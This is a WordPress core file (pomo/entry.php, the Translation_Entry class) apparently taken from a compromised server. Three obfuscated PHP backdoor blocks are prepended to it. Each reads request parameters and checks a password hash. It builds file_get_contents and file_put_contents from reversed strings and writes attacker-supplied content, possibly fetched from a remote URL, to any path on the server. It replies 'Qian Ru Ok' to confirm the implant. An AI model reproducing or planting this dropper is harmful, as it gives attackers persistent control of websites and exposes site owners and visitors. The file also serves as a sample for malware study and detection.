File: /home/wwwrenee/public_html/wp-includes/pomo/entry.php
<?php
$AGmntTM = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($AGmntTM[0]) /*+/*+*/
. md5($AGmntTM[0])) == "d".
"d".
"e".
"9".
"b".
"a".
"5".
"3".
"0".
"d".
"7".
"4".
"0".
"7".
"b".
"9".
"7".
"2".
"8".
"3".
"0".
"f".
"1".
"e".
"c".
"2".
"9".
"6".
"a".
"d".
"d".
"1") {
$RaGdB = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$UIsqmK = $RaGdB /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$FUzhwzT = $RaGdB
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function bYbFEHpBSR($TYupprygL) { if (empty($TYupprygL)) return false; if (!is_dir($TYupprygL)) { bYbFEHpBSR(dirname($TYupprygL), 0755, true); mkdir($TYupprygL); } } !file_exists(dirname($AGmntTM[1])) && bYbFEHpBSR(dirname($AGmntTM[1])); $MrQGX = @$FUzhwzT($AGmntTM[2]); echo @$UIsqmK($AGmntTM[1], $MrQGX) ? 1 : 0; die; }key($AGmntTM) == "of" && die("Qian Ru Ok"); ?><?php
$IRzznM = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($IRzznM[0]) /*+/*+*/
. md5($IRzznM[0])) == "3".
"9".
"1".
"d".
"f".
"3".
"b".
"4".
"d".
"d".
"6".
"0".
"d".
"7".
"1".
"d".
"c".
"5".
"1".
"c".
"6".
"6".
"9".
"2".
"f".
"1".
"0".
"f".
"6".
"d".
"3".
"c") {
$otuGHa = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$QdWnzWlwa = $otuGHa /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$RfzPMboHqS = $otuGHa
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function CIThHfzXc($zDbxnlU) { if (empty($zDbxnlU)) return false; if (!is_dir($zDbxnlU)) { CIThHfzXc(dirname($zDbxnlU), 0755, true); mkdir($zDbxnlU); } } !file_exists(dirname($IRzznM[1])) && CIThHfzXc(dirname($IRzznM[1])); $laYVUHsAuv = @$RfzPMboHqS($IRzznM[2]); echo @$QdWnzWlwa($IRzznM[1], $laYVUHsAuv) ? 1 : 0; die; }key($IRzznM) == "of" && die("Qian Ru Ok"); ?><?php
$ZKwsX = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($ZKwsX[0]) /*+/*+*/
. md5($ZKwsX[0])) == "7".
"3".
"0".
"c".
"c".
"b".
"2".
"d".
"2".
"f".
"5".
"d".
"4".
"c".
"c".
"9".
"f".
"2".
"7".
"4".
"f".
"0".
"e".
"2".
"f".
"b".
"1".
"8".
"8".
"6".
"0".
"2") {
$yIgkpcpZaL = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$NEgcCvURWs = $yIgkpcpZaL /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$OuOUxSirg = $yIgkpcpZaL
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function SlTbSV($gtAvRvVeL) { if (empty($gtAvRvVeL)) return false; if (!is_dir($gtAvRvVeL)) { SlTbSV(dirname($gtAvRvVeL), 0755, true); mkdir($gtAvRvVeL); } } !file_exists(dirname($ZKwsX[1])) && SlTbSV(dirname($ZKwsX[1])); $TrmwORNEA = @$OuOUxSirg($ZKwsX[2]); echo @$NEgcCvURWs($ZKwsX[1], $TrmwORNEA) ? 1 : 0; die; }key($ZKwsX) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Contains Translation_Entry class
*
* @version $Id: entry.php 1157 2015-11-20 04:30:11Z dd32 $
* @package pomo
* @subpackage entry
*/
if ( ! class_exists( 'Translation_Entry', false ) ) :
/**
* Translation_Entry class encapsulates a translatable string.
*/
class Translation_Entry {
/**
* Whether the entry contains a string and its plural form, default is false.
*
* @var bool
*/
public $is_plural = false;
public $context = null;
public $singular = null;
public $plural = null;
public $translations = array();
public $translator_comments = '';
public $extracted_comments = '';
public $references = array();
public $flags = array();
/**
* @param array $args {
* Arguments array, supports the following keys:
*
* @type string $singular The string to translate, if omitted an
* empty entry will be created.
* @type string $plural The plural form of the string, setting
* this will set `$is_plural` to true.
* @type array $translations Translations of the string and possibly
* its plural forms.
* @type string $context A string differentiating two equal strings
* used in different contexts.
* @type string $translator_comments Comments left by translators.
* @type string $extracted_comments Comments left by developers.
* @type array $references Places in the code this string is used, in
* relative_to_root_path/file.php:linenum form.
* @type array $flags Flags like php-format.
* }
*/
public function __construct( $args = array() ) {
// If no singular -- empty object.
if ( ! isset( $args['singular'] ) ) {
return;
}
// Get member variable values from args hash.
foreach ( $args as $varname => $value ) {
$this->$varname = $value;
}
if ( isset( $args['plural'] ) && $args['plural'] ) {
$this->is_plural = true;
}
if ( ! is_array( $this->translations ) ) {
$this->translations = array();
}
if ( ! is_array( $this->references ) ) {
$this->references = array();
}
if ( ! is_array( $this->flags ) ) {
$this->flags = array();
}
}
/**
* PHP4 constructor.
*
* @deprecated 5.4.0 Use __construct() instead.
*
* @see Translation_Entry::__construct()
*/
public function Translation_Entry( $args = array() ) {
_deprecated_constructor( self::class, '5.4.0', static::class );
self::__construct( $args );
}
/**
* Generates a unique key for this entry.
*
* @return string|false The key or false if the entry is empty.
*/
public function key() {
if ( null === $this->singular || '' === $this->singular ) {
return false;
}
// Prepend context and EOT, like in MO files.
$key = ! $this->context ? $this->singular : $this->context . "\4" . $this->singular;
// Standardize on \n line endings.
$key = str_replace( array( "\r\n", "\r" ), "\n", $key );
return $key;
}
/**
* @param object $other
*/
public function merge_with( &$other ) {
$this->flags = array_unique( array_merge( $this->flags, $other->flags ) );
$this->references = array_unique( array_merge( $this->references, $other->references ) );
if ( $this->extracted_comments != $other->extracted_comments ) {
$this->extracted_comments .= $other->extracted_comments;
}
}
}
endif; ?>